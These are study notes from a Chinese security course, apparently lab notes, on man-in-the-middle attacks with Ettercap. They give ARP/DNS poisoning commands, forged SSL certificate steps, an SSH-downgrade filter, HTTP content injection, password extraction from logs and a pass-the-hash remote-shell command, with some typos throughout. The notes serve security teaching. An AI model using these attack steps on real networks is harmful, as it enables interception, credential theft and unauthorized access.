安全牛课堂
安全牛课堂

【安全牛学习笔记】中间人攻击、ARP MITM、中间人攻击、Pass the Hash

中间人攻击                                      

Ettercap                                        

    - 统一的中间人攻击工具                      

    - 转发MAC与本机相同,但IP与本机不同的数据包

    - 支持SSH1SSL中间人攻击                   

模块划分                                        

    - Snifer                                    

    - MITM                                      

    - Filter                                    

    - Log                                       

    - Plugin

中间人攻击                                                

Snifer                                                    

    - 负责数据包转发                                      

    - Unified                                             

      单网卡情况下独立完成三层包转发                      

      始终禁用内核IP_Forward功能                          

    - Bridge                                              

      双网卡网卡的一层MITM模式                            

      可作为IPS过滤数据包                                 

      不可在网卡上使用(透明网桥)                        

MITM                                                      

    - 把流量重定向想到ettercap主机上                      

    - 可以使用其他工具实现MITMettercap之作嗅探和过滤使用

中间人攻击                                    

实现MITM的方法                                

    - ARP                                     

    - ICMP                                    

      ICMP路由重定向,半双工                  

    - DHCP                                    

      修改网关地址,半双工                    

    - Switch Port Stealing                    

      flood目标地址是本机,源地址是受害者的包

      适用于ARP静态绑定的环境                 

    - NDP                                     

      IPv6协议欺骗技术

中间人攻击                                    

2.4以上内核对ARP地址欺骗的约束                

    - 收到非请求的ARP响应包,不更新本地ARP缓存

    - Ettercap适用ARP request包进行攻击       

Solaris不根据ARP包更新本地ARP缓存             

    - Ettercap使用先发ICMP包来更新ARP缓存

中间人攻击                              

用户操作界面                            

    - -T     文本界面                   

    - -G     图形界面                   

    - -C     基于文本的图形界面         

    - -D     后台模式                   

指定目标                                

    - IPv4 : MAC/IPs/Ports              

    - IPv6 : MAC/IPs/IPv6/Ports         

    - /10.0.0.1-5;10.0.1.33/20-25,80,110

oot@k:~# ettercap -T

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Listening on:

  eth0 -> 00:0C:29:DB:CD:FC

  fe80::20c:29ff:fedb:cdfc/64

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file

Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.

Privileges dropped to EUID 65534 EGID 65534...

  33 plugins

  42 protocol dissectors

  57 ports monitored

20388 mac vendor fingerprint

1766 tcp OS fingerprint

2182 known services

Lua: no scripts were specified, not starting up!

Randomizing -1 hosts for scanning...

Scanning the whole netmask for -1 hosts...

Fri May 13 22:57:16 2016 [550658]

  fe80::20c:29ff:fedb:cdfc:0 --> ff02::2:0 | FR (0)

0 hosts added to the hosts list...

Starting Unified sniffing...

Text only Interface activated...

Hit 'h' for inline help

Fri May 13 22:57:20 2016 [551628]

  fe80::20c:29ff:fedb:cdfc:0 --> ff02::2:0 | FR (0)

root@k:~# ettercap -G

root@k:~# ettercap -C

root@k:~# ettercap -D

root@k:~# ettercap 00:11:11:11:11:11 /1.1.1.1-10;11/25,80,21 /1.1.1.2/

中间人攻击                                                            ┃

权限                                                                  ┃

   - 需要root权限打开链路层Socket连接,然后使用nobody账号运行       

   - 日志写入目录需要nobody有写入权                                 

   - 修改etter.conf : EC_UID=65534                            

基于伪造证书的SSL MITIM                                               

   - Bridge模式不支持SSL MITM                                      

   - openssl genrsa -out etter.ssl.crt 1024                          

   - openssl req -new-keyetter.ssl.crt -out tmp.csr                  

   - openssl x509 -req -days 1825 -in tmp.csr -signkey etter.ssl.crt 

     -out tmp.new                                                    ┃

   - cat tmp.new>>etrer.ssl.crt                                      

   - rm -f tmp.newtmp.csr

root@k:~# vi /etc/ettercap/etter.conf   //主配置文件

############################################################################

#                                                                          #

#  ettercap -- etter.conf -- configuration file                            #

#                                                                          #

#  Copyright (C) ALoR & NaGA                                               #

#                                                                          #

#  This program is free software; you can redistribute it and/or modify    #

#  it under the terms of the GNU General Public License as published by    #

#  the Free Software Foundation; either version 2 of the License, or       #

#  (at your option) any later version.                                     #

#                                                                          #

#                                                                          #

############################################################################

[privs]

ec_uid = 65534                # nobody is the default

ec_gid = 65534                # nobody is the default

[mitm]

arp_storm_delay = 10          # milliseconds

arp_poison_smart = 0          # boolean

arp_poison_warm_up = 1        # seconds

arp_poison_delay = 10         # seconds

arp_poison_icmp = 1           # boolean

arp_poison_reply = 1          # boolean

arp_poison_request = 0        # boolean

arp_poison_equal_mac = 1      # boolean

dhcp_lease_time = 1800        # seconds

port_steal_delay = 10         # seconds

port_steal_send_delay = 2000  # microseconds

ndp_poison_warm_up = 1        # seconds

ndp_poison_delay = 5          # seconds

ndp_poison_send_delay = 1500  # microseconds

ndp_poison_icmp = 1           # boolean

ndp_poison_equal_mac = 1      # boolean

icmp6_probe_delay = 3         # seconds

[connections]

connection_timeout = 300      # seconds

connection_idle = 5           # seconds

connection_buffer = 10000     # bytes

connect_timeout = 5           # seconds

[stats]

sampling_rate = 50            # number of packets 

[misc]

close_on_eof = 1              # boolean value

store_profiles = 1            # 0 = disabled; 1 = all; 2 = local; 3 = remote

aggressive_dissectors = 1     # boolean value

skip_forwarded_pcks = 1       # boolean value

checksum_check = 0            # boolean value

submit_fingerprint = 0        # boolean valid (set if you want ettercap to submit unknown finger prints)

checksum_warning = 0          # boolean value (valid only if checksum_check is 1)

sniffing_at_startup = 1       # boolean value

#######################################################################

#

# You can specify what DISSECTORS are to be enabled or not...

#

# e.g.:     ftp = 21            enabled on port 21 (tcp is implicit)

#           ftp = 2345          enabled on non standard port

#           ftp = 21,453        enabled on port 21 and 453

#           ftp = 0             disabled

#  NOTE: some dissectors have multiple default ports, if you specify a new

#        one, all the default ports will be overwritten

#dissector                 default port

[dissectors]

ftp = 21                   # tcp    21

ssh = 22                   # tcp    22

telnet = 23                # tcp    23

smtp = 25                  # tcp    25

dns = 53                   # udp    53

dhcp = 67                  # udp    68

http = 80                  # tcp    80

ospf = 89                  # ip     89  (IPPROTO 0x59)

pop3 = 110                 # tcp    110

#portmap = 111              # tcp / udp 

vrrp = 112                 # ip     112 (IPPROTO 0x70)

nntp = 119                 # tcp    119

smb = 139,445              # tcp    139 445

imap = 143,220             # tcp    143 220

snmp = 161                 # udp    161

bgp = 179                  # tcp    179

ldap = 389                 # tcp    389

https = 443                # tcp    443

ssmtp = 465                # tcp    465

rlogin = 512,513           # tcp    512 513

rip = 520                  # udp    520

nntps = 563                # tcp    563

ldaps = 636                # tcp    636

telnets = 992              # tcp    992

imaps = 993                # tcp    993

ircs = 994                 # tcp    993

pop3s = 995                # tcp    995

socks = 1080               # tcp    1080

radius = 1645,1646         # udp    1645 1646

msn = 1863                 # tcp    1863

cvs = 2401                 # tcp    2401

mysql = 3306               # tcp    3306

icq = 5190                 # tcp    5190

ymsg = 5050                # tcp    5050

mdns = 5353                # udp    5353

vnc = 5900,5901,5902,5903  # tcp    5900 5901 5902 5903

x11 = 6000,6001,6002,6003  # tcp    6000 6001 6002 6003

irc = 6666,6667,6668,6669  # tcp    6666 6667 6668 6669

gg = 8074            # tcp    8074

proxy = 8080               # tcp    8080

rcon = 27015,27960         # udp    27015 27960

ppp = 34827                # special case ;) this is the Net Layer code

TN3270 = 23,992            # tcp    23 992

# you can change the colors of the curses GUI.

# here is a list of values:

#  0 Black     4 Blue

#  1 Red       5 Magenta

#  2 Green     6 Cyan

#  3 Yellow    7 White

#

[curses]

color_bg = 0

color_fg = 7 

color_join1 = 2 

color_join2 = 4 

color_border = 7

color_title = 3 

color_focus = 6 

color_menu_bg = 4

color_menu_fg = 6 

color_window_bg = 4 

color_window_fg = 7 

color_selection_bg = 6 

color_selection_fg = 6 

color_error_bg = 1 

color_error_fg = 3 

color_error_border = 3 

#

# This section includes all the configurations that needs a string as a

# parmeter such as the redirect command for SSL mitm attack.

#

[strings]

# the default encoding to be used for the UTF-8 visualization

utf8_encoding = "ISO-8859-1"

# the command used by the remote_browser plugin

remote_browser = "xdg-open http://%host%url"

#####################################

#       redir_command_on/off

#####################################

# you must provide a valid script for your operating system in order to have

# the SSL dissection available

# note that the cleanup script is executed without enough privileges (because

# they are dropped on startup). so you have to either: provide a setuid program

# or set the ec_uid to 0, in order to be sure the cleanup script will be

# executed properly

# NOTE: the script must fit into one line with a maximum of 255 characters

#---------------

#     Linux 

#---------------

# if you use ipchains:

   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:

   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

#---------------

#    Mac Os X

#---------------

# quick and dirty way:

   #redir_command_on = "ipfw -q add set %set fwd 127.0.0.1,%rport tcp from any to any %port in via %iface"

   #redir_command_off = "ipfw -q delete set %set"

# a better solution is to use a script that keeps track of the rules interted

# and then deletes them on exit:

 # redir_command_on:

 # ----- cut here -------

 #   #!/bin/sh

 #   if [ -a "/tmp/osx_ipfw_rules" ]; then

 #      ipfw -q add `head -n 1 osx_ipfw_rules` fwd 127.0.0.1,$1 tcp from any to any $2 in via $3 

 #   else

 #      ipfw add fwd 127.0.0.1,$1 tcp from any to any $2 in via $3 | cut -d " " -f 1 >> /tmp/osx_ipfw_rules

 #   fi

 # ----- cut here -------

 # redir_command_off:

 # ----- cut here -------

 #   #!/bin/sh

 #   if [ -a "/tmp/osx_ipfw_rules" ]; then

 #      ipfw -q delete `head -n 1 /tmp/osx_ipfw_rules`

 #      rm -f /tmp/osx_ipfw_rules

 #   fi

 # ----- cut here -------

#---------------

#   FreeBSD

#---------------

# Before OF can be used, make sure the kernel module has been loaded by

# `kldstat | grep pf.ko`. If the rusult is empty, you can load it by

# `kldload pf.ko` or add 'pf_enable="YES"' to the /etc/rc.conf and reboot.

# Check if the PF status is enabled by 

# `pfctl -si | grep Status | awk '{print $2;}'`. If "Disabled", enable it with

# `pfctl -e`.

   #redir_command_on = "(pfctl -sn 2> /dev/null; echo 'rdr pass on %iface inet proto tcp from any to any port %port -> localhost port %rport') | pfctl -f - 2> /dev/null"

   #redir_command_off = "pfctl -Psn 2> /dev/null | grep -v %port | pfctl -f - 2> /dev/null"

#---------------

#   Open BSD

#---------------

# unfortunately the pfctl command does not accepts direct rules adding

# you have to use a script which executed the following command:

 # ----- cut here -------

 #   #!/bin/sh

 #   rdr pass on $1 inet proto tcp from any to any port $2 -> localhost port $3 | pfctl -a sslsniff -f -

 # ----- cut here -------

# it's important to remember that you need "rdr-anchor sslsniff" in your

# pf.conf in the TRANSLATION section.

#redir_command_on = "the_script_described_above %iface %port %rport"

#redir_command_off = "pfctl -a sslsniff -Fn"

# also, if you create a group called "pfusers" and have EC_GID be that group,

# you can do something like:

#     chgrp pfusers /dev/pf

#     chmod g+rw /dev/pf

# such that all users in "pfusers" can run pfctl commands; thus allowing non-root

# execution of redir commands. 

##########

#  EOF   #

##########

ARP MITM                                                                   

字符模式                                                                   

    - ettercap -i eth0 -T -M arp -q /192.168.1.1// /192.168.1.2// -F 1.ef -P

      autoadd -w a.cap -l loginfo -L logall -m message                      

图形界面                                                                    

SSL MITM                                                                   

    - vi /etc/ettercap/etter.conf                                           

DNS欺骗                                                                    

    - dns_spoof插件配置文件                                                 

    - vi /etc/ettercap/etter.dns

root@k:~# ettercap -i eth0 -T -M arp -q /192.168.1.1// /192.168.1.114// -w a.cap -l loginfo -L logall -m message

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Listening on:

  eth0 -> 08:00:27:DB:B2:AF

          192.168.1.110/255.255.255.0

          fe80::a00:27ff:fedb:b2af/64

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file

Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.

Privileges dropped to EUID 0 EGID 0...

  33 plug:ns

  42 protocol dissectors

  57 ports monitored

20388 mac vendor fingerprint

1766 tcp OS fingerprint

2182 known services

Lua: no scripts were specified, not starting up!

Scanning for merged targets (2 hosts)...

* |======================================================>| 100.00%

3 hosts added to the hosts list...

ARP poisoning victims:

  GROUP 1 : 192.168.1.1 14:75:90:21:4F:56

  GROUP 2 : 192.168.1.114 78:92:9C:03:6F:18

Starting Unified sniffing

Text only Interface activated ...

Hit 'h' for inline help

FTP : 74.81.178.167:21 -> USER: user123 PASS: password123

root@k:~# ettercap -T -< arp:remote -i eth0 /192.168.1.1// /192.168.1.114// -w a.cap -l loginfo -L logall.ecp      logall.ecp     logall.ecp.eci    logall.ecp.ecp

root@k:~# gedit /etc/ettercap/etter.conf

root@k:~# gedit /etc/ettercap/etter.dns

#######################################################################

#                                                                          #

#  ettercap -- etter.dns -- host file for dns_spoof plugin                 #

#                                                                          #

#  Copyright (C) ALoR & NaGA                                               #

#                                                                          #

#  This program is free software; you can redistribute it and/or modify    #

#  it under the terms of the GNU General Public License as published by    #

#  the Free Software Foundation; either version 2 of the License, or       #

#  (at your option) any later version.                                     #

#                                                                          #

#######################################################################

#                                                                          #

# Sample hosts file for dns_spoof plugin                                   #

#                                                                          #

# the format is (for A query):                                             #

#   www.myhostname.com A 168.11.22.33                                      #

#   *.foo.com          A 168.44.55.66                                      #

#                                                                          #

# ... for a AAAA query (same hostname allowed):                            #

#   www.myhostname.com AAAA 2001:db8::1                                    #

#   *.foo.com          AAAA 2001:db8::2                                    #

#                                                                          #

# or to skip a protocol family (useful with dual-stack):                   #

#   www.hotmail.com    AAAA ::                                             #

#   www.yahoo.com      A    0.0.0.0                                        #

  

# or for PTR query:                                                        #

#   www.bar.com    PTR 10.0.0.10                                           #

#   www.google.com PTR ::1                                                 #

#  

# or for MX query (either IPv4 or IPv6):                                   #

#    domain.com MX xxx.xxx.xxx.xxx                                         #

#    domain2.com MX xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx                #

#    domain3.com MX xxxx:xxxx::y                                           #

#        

# or for WINS query:                                                       #

#    workgroup WINS 127.0.0.1                                              #

#    PC*       WINS 127.0.0.1                                              #

#                                                                          #

# or for SRV query (either IPv4 or IPv6):                                  #

#    service._tcp|_udp.domain SRV 192.168.1.10:port                        #

#    service._tcp|_udp.domain SRV [2001:db8::3]:port                       #

#                                                                          #

# or for TXT query (value must be wrapped in double quotes):               #

#    google.com TXT "v=spf1 ip4:192.168.0.3/32 ~all"                       #

#                                                                          #

# NOTE: the wildcarded hosts can't be used to poison the PTR requests      #

#       so if you want to reverse poison you have to specify a plain       #

#       host. (look at the www.microsoft.com example)                      #

#                                                                          #

#######################################################################

################################

# microsoft sucks ;)

# redirect it to www.linux.org

#

microsoft.com      A   192.168.1.1

*.microsoft.com    A   162.168.1.1

www.microsoft.com  PTR 192.168.1.1      # Wildcards in PTR are not allowed

##########################################

# no one out there can have our domains...

#

www.alor.org  A 127.0.0.1

www.naga.org  A 127.0.0.1

www.naga.org  AAAA 2001:db8::2

##########################################

# dual stack enabled hosts does not make life easy

# force them back to single stack 

www.ietf.org   A    127.0.0.1

www.ietf.org   AAAA ::

www.example.org  A    0.0.0.0

www.example.org  AAAA ::1

###############################################

# one day we will have our ettercap.org domain

#

www.ettercap.org           A  127.0.0.1

www.ettercap-project.org   A  127.0.0.1

ettercap.sourceforge.net   A  23.235.43.133

www.ettercap.org           PTR ::1

###############################################

# some MX examples

#

alor.org   MX  127.0.0.1

naga.org   MX  127.0.0.1

example.org MX 127.0.0.2

microsoft.com MX 2001:db8::1ce:c01d:bee3

###############################################

# This messes up NetBIOS clients using DNS

# resolutions. I.e. Windows/Samba file sharing.

LAB-PC*  WINS  127.0.0.1

###############################################

# some service discovery examples

xmpp-server._tcp.jabber.org SRV 192.168.1.10:5269     

ldap._udp.mynet.com SRV [2001:db8:c001:beef::1]:389   

###############################################

# little example for TXT records

#

naga.org TXT "v=spf1 ip4:192.168.1.2 ip6:2001:db8:d0b1:beef::2 -all"

# vim:ts=8:noexpandtab

----------------------------------------------------------------------------

ettercap 0.8.2 ----->Plugins----->manage the plugins----->dns_spoof(双击)

root@k:~# ettercap -i eth0 -T -M arp -q /192.168.1.1// /192.168.1.114// -p dns_spoof

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Listening on:

  eth0 -> 08:00:27:DB:B2:AF

          192.168.1.110/255.255.255.0

          fe80::a00:27ff:fedb:b2af/64

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file

Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.

Privileges dropped to EUID 0 EGID 0...

  33 plug:ns

  42 protocol dissectors

  57 ports monitored

20388 mac vendor fingerprint

1766 tcp OS fingerprint

2182 known services

Lua: no scripts were specified, not starting up!

Scanning for merged targets (2 hosts)...

* |======================================================>| 100.00%

3 hosts added to the hosts list...

ARP poisoning victims:

  GROUP 1 : 192.168.1.1 14:75:90:21:4F:56

  GROUP 2 : 192.168.1.114 78:92:9C:03:6F:18

Starting Unified sniffing

Text only Interface activated ...

Hit 'h' for inline help

ARP MITM                                                           

Ettercap日志查看                                                    

    - etterlog -p log.eci                   查看获取的密码          

    - etterlog -c log.ecp                   列出Log中的连接         

    - etterlog -c -f /1.1.1.1/ log.ecp                              

    - etterlog -B -n -s -F TCP:1.1.1.1:20:1.1.1.2:1234 log.ecp > aa

                                            选择相应的连接并榨取文件

root@k:~# etterlog -p logall.ect

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Log file version     : 0.8.2

Timestamp            : Thu Mya 5 23:56:43 2016 [619991]

Type                 : LOG_INFO

74091.178.167      TCP 21    USER: user 123        PASS: password123

root@k:~# etterlog -c logall.ecp.ecp

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Log file version     : 0.8.2

Timestamp            : Thu Mya 5 23:56:43 2016 [619991]

Type                 : LOG_INFO

Creating the connection table...

Found 2 connection...

TCP: 192.168.1.114:51700 <--> 74.91.178.167:21

TCP: 192.168.1.114:51788 <--> 74.91.178.167:21

root@k:~# etterlog -c logall.ecp

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Log file version     : 0.8.2

Timestamp            : Thu Mya 5 23:56:43 2016 [619991]

Type                 : LOG_INFO

Creating the connection table...

Found 10 connection...

TCP: 192.168.1.114:51977 <--> 13.67.53.38:443

TCP: 192.168.1.114:51798 <--> 58.250.11.124:8080

TCP: 192.168.1.114:51797 <--> 58.250.11.124:8080

TCP: 192.168.1.114:55285 <--> 124.207.160.106:53

TCP: 192.168.1.114:51796 <--> 119.147.21.204:443

TCP: 192.168.1.114:49327 <--> 124.207.160.106:53

TCP: 192.168.1.114:51795 <--> 74.91.178.167:21

TCP: 192.168.1.114:51791 <--> 74.91.178.167:21

TCP: 192.168.1.114:51794 <--> 14.215.152.238:443

TCP: 192.168.1.114:57885 <--> 224.0.0.252:5355

ARP MITM                                                             

Filter                                                               

    - /usr/share/ettercap/                                           

SSH-2.xx / SSH-1.99 / SSH-1.51                                        

    - etterfilter etter.filter.ssh -o ssh.ef                          

替换HTTP内容                                                          

    - if(ip.proto == TCP && tcp.src == 80){                           

    -     msg("data on TCP 80\n");                                    

    -         replace("img src=","img src=\"http://1.1.1.1/1.gif\"");

    -         replace("IMG src=","img src=\"http://1.1.1.1/1.gif\"");

    -         replace("IMG SRG=","img src=\"http://1.1.1.1/1.gif\"");

    - }

root@k:~# cd /usr/share/ettercap

root@k:/usr/share/ettercap# ls

AUTHORS             etter.fields           etter.filter.pcre  etterlog.dtd

doc                 etter.filter           etter.filter.ssh   etter.mime

ettercap.png        etterfilter.cnt        etterfilter.tbl    etter.services

ettercap-small.png  etter.filter.examples  etter.finger.mac   etter.ssl.crt

ettercap.svg        etter.filter.kill      etter.finger.os    lua

root@k:~# gedit etter.filter.ssh

############################################################################

#                                                                          #

#  ettercap -- etter.filter -- filter source file                          #

#                                                                          #

#  Copyright (C) ALoR & NaGA                                               #

#                                                                          #

#  This program is free software; you can redistribute it and/or modify    #

#  it under the terms of the GNU General Public License as published by    #

#  the Free Software Foundation; either version 2 of the License, or       #

#  (at your option) any later version.                                     #

#                                                                          #

############################################################################

##

#

#   This filter will substitute the SSH server response from SSH-1.99 to

#   SSH-1.51, so if the server supports both ssh1 and ssh2 we will force

#   it to use ssh1... ;)

#   server response :    SSH-2.00   only ssh2 supported

#                        SSH-1.99   both ssh1 and ssh2 supported

#                        SSH-1.51   only ssh1 supported

##

if (ip.proto == TCP) {

   if (tcp.src == 22) {

      if ( replace("SSH-1.99", "SSH-1.51") ) {

         msg("[SSH Filter] SSH downgraded from version 2 to 1\n");

      } else {

         if ( search(DATA.data, "SSH-2.00") ) {

            msg("[SSH Filter] Server supports only SSH version 2\n");

         } else {

            if ( search(DATA.data, "SSH-1.51") ) {

               msg("[SSH Filter] Server already supports only version 1\n");

            }

         }

      }

   } 

}

root@k:~# etterfilter etter.filter.ssh -o ssh.ef

root@k:/usr/share/ettercap#  etterfilter etter.filter.ssh -o ssh.ef

etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team

 14 protocol tables loaded:

DECODED DATA udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth 

 13 constants loaded:

VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP 

 Parsing source file 'etter.filter.ssh'  done.

 Unfolding the meta-tree  done.

 Converting labels to real offsets  done.

 Writing output to 'ssh.ef'  done.

 -> Script encoded into 16 instructions.

root@k:/usr/share/ettercap# ls

AUTHORS             etter.filter           etterfilter.tbl   etter.ssl.crt

doc                 etterfilter.cnt        etter.finger.mac  lua

ettercap.png        etter.filter.examples  etter.finger.os   ssh.ef

ettercap-small.png  etter.filter.kill      etterlog.dtd

ettercap.svg        etter.filter.pcre      etter.mime

etter.fields        etter.filter.ssh       etter.services

root@k:/usr/share/ettercap# cat ssh.ef

root@k:/usr/share/ettercap# mv ssh.ef /root/

root@k:/usr/share/ettercap# cd

root@k:~# ettercap -Tq -M arp:remote -i eth0 /192.168.1.1// /192.168.1.114// -F ssh.ef

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Listening on:

  eth0 -> 08:00:27:DB:B2:AF

          192.168.1.110/255.255.255.0

          fe80::a00:27ff:fedb:b2af/64

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file

Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.

Privileges dropped to EUID 0 EGID 0...

  33 plug:ns

  42 protocol dissectors

  57 ports monitored

20388 mac vendor fingerprint

1766 tcp OS fingerprint

2182 known services

Lua: no scripts were specified, not starting up!

Scanning for merged targets (2 hosts)...

* |======================================================>| 100.00%

2 hosts added to the hosts list...

ARP poisoning victims:

  GROUP 1 : 192.168.1.1 14:75:90:21:4F:56

  GROUP 2 : 192.168.1.114 78:92:9C:03:6F:18

Starting Unified sniffing

Text only Interface activated ...

Hit 'h' for inline help

中间人攻击                                                        

ICMP                                                   

    - -M icmp:00:11:22:33:44:55/10.0.1(真是网关的MAC/IP)          

DHCP                                                            

    - -M dhcp:192.168.0.30,35,50-60/255.255.255.0/192.168.0.1(DNS)

Port                                                           

    - -M port /1.1.1.1/ /1.1.1.2/                                 

Ndp                                                       

    - -M ndp //fe80::260d:afff:fe6e:f378/ //2001:db8::2:1/

Pass the Hash (PTH)                               

密码破解耗费时间资源巨大                          

使用密文提交给服务器直接完成身份认证              

NTLM/LM是没有加盐的静态HASH密文                   

企业中使用ghost等工具克隆安装系统                 

pth-winexe -U                                     

w7%aad3b435b51404eeaadd3b435b51404ee:ed1bfaeb3063

716ab7fe2allfaf126d8 //1.1.1.1 cmd

root@k:~# mount /dev/sha2 /mnt

root@k:~# cd /mnt/Windows/System32/config

该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证?


      牛妹先给大家介绍一下Security+


        Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

       通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因?  

       原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。

      目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

       原因二: IT运维人员工作与翻身的利器。

       在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

        原因三:接地气、国际范儿、考试方便、费用适中!

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。

你可能感兴趣的:(信息安全)

  • 详细的等保测评攻略就在这里 快快小毛毛 网络网络安全系统安全
    信息安全等级保护,是对信息和信息载体按照重要性等级分级别进行保护的一种工作。目前我国实行的是等保2.0于2019年12月1日开始实施,等保2.0从传统的信息系统,转变成具有基础信息网络平台的多种新兴技术对象,即具有网络服务,有数据的网络服务平台都可以成为新兴的测评对象。等保2.0备案从原来的自主定级改变成系统定级,才能得到公安机关的备案,关于等保测评详细攻略如下:等保2.0定级步骤:确定定级对象—
  • 等保测评中的关键技术挑战与应对策略 亿林数据 网络安全等保测评
    在信息安全领域,等保测评(信息安全等级保护测评)作为确保信息系统安全性的重要手段,其过程中不可避免地会遇到一系列技术挑战。这些挑战不仅考验着企业的技术实力,也对其安全管理水平提出了更高要求。本文将深入探讨等保测评中的关键技术挑战,并提出相应的应对策略。一、等保测评中的关键技术挑战1.复杂系统架构的评估难度随着信息技术的快速发展,企业信息系统的架构日益复杂,包括分布式系统、微服务架构、云计算环境等。
  • CDGA学习笔记三-《数据安全》 zy_chris 网络安全
    七、数据安全7.1引言数据安全包括安全策略和过程的规划、建立与执行,为数据和信息资产提供正确的身份验证、授权、访问和审计。要求来自以下方面:(1)利益相关方(2)政府法规(3)特定业务关注点(4)合法访问需求(5)合同义务7.1.1业务驱动因素1、降低风险信息安全首先对组织数据进行分级分类,对组织数据进行分类分级的整个流程:1)识别敏感数据资产并分类分级2)在企业中查找敏感数据3)确定保护每项资产
  • 学习笔记:FW内容安全概述 TKE_yinian
    内容安全概述信息安全概述主要威胁关于防护简介内容安全威胁应用层威胁内容安全技术WEB安全应用安全入侵防御检测邮件安全数据安全网络安全反病毒全局环境感知沙箱检测信息安全概述•信息安全是对信息和信息系统进行保护,防止未授权的访问、使用、泄露、中断、修改、破坏并以此提供保密性、完整性和可用性。•为关键资产提供机密性、完整性和可用性(CIA三元组)保护是信息安全的核心目标。CIA(Confidential
  • 信创环境下源代码防泄露解决方案 Felixwb 网络服务器
    在当今数字化时代,信息安全已成为企业生存与发展的基石,尤其是在信息技术应用创新(信创)环境下,数据保护更是被提升至前所未有的高度。SDC沙盒防泄露系统以其独特的技术架构和卓越的安全性能,在信创环境中构筑起一道坚不可摧的数据防护墙,有效保障了企业数据的安全与隐私。SDC沙盒防泄露系统是一款专为解决数据泄露问题而设计的高端安全产品。该系统通过构建一个隔离的、可控的执行环境(即“沙盒”),对敏感数据的访
  • 国家等保 2.0 时代,你的移动安全要如何防护? Reneeeeee412
    移动互联时代,什么对企业最重要?是人才?是技术?在勒索病毒“WannaCry”肆虐全球之后企业更加意识到安全才是关键所在跃至2.0时代国家等级保护范围扩展到新领域在信息安全领域,国家提出了最为深远的保障制度——信息安全等级保护制度。在2017年5月等保制度顺应时代要求一跃升级到2.0,不仅安全等级的评定条件更加严格,保护要求也扩展到移动互联、云计算、大数据、物联网和工业控制等新技术和新应用领域。在
  • 推动国密SSL发展的建议与策略 bilicute ssl网络协议网络
    摘要:国密SSL作为我国网络安全的重要组成部分,其发展对于保障国家信息安全具有重要意义。本文针对国密SSL当前发展现状,提出了几点发展建议,旨在推动国密SSL技术的广泛应用和市场竞争力。一、引言国密SSL(SecureSocketsLayer)是指采用国家商用密码算法的SSL证书,它在我国网络安全体系中扮演着至关重要的角色。随着网络信息化的快速发展,国密SSL的应用前景日益广阔。然而,面对国际SS
  • 浅析‖医疗行业数据安全 等保星视界
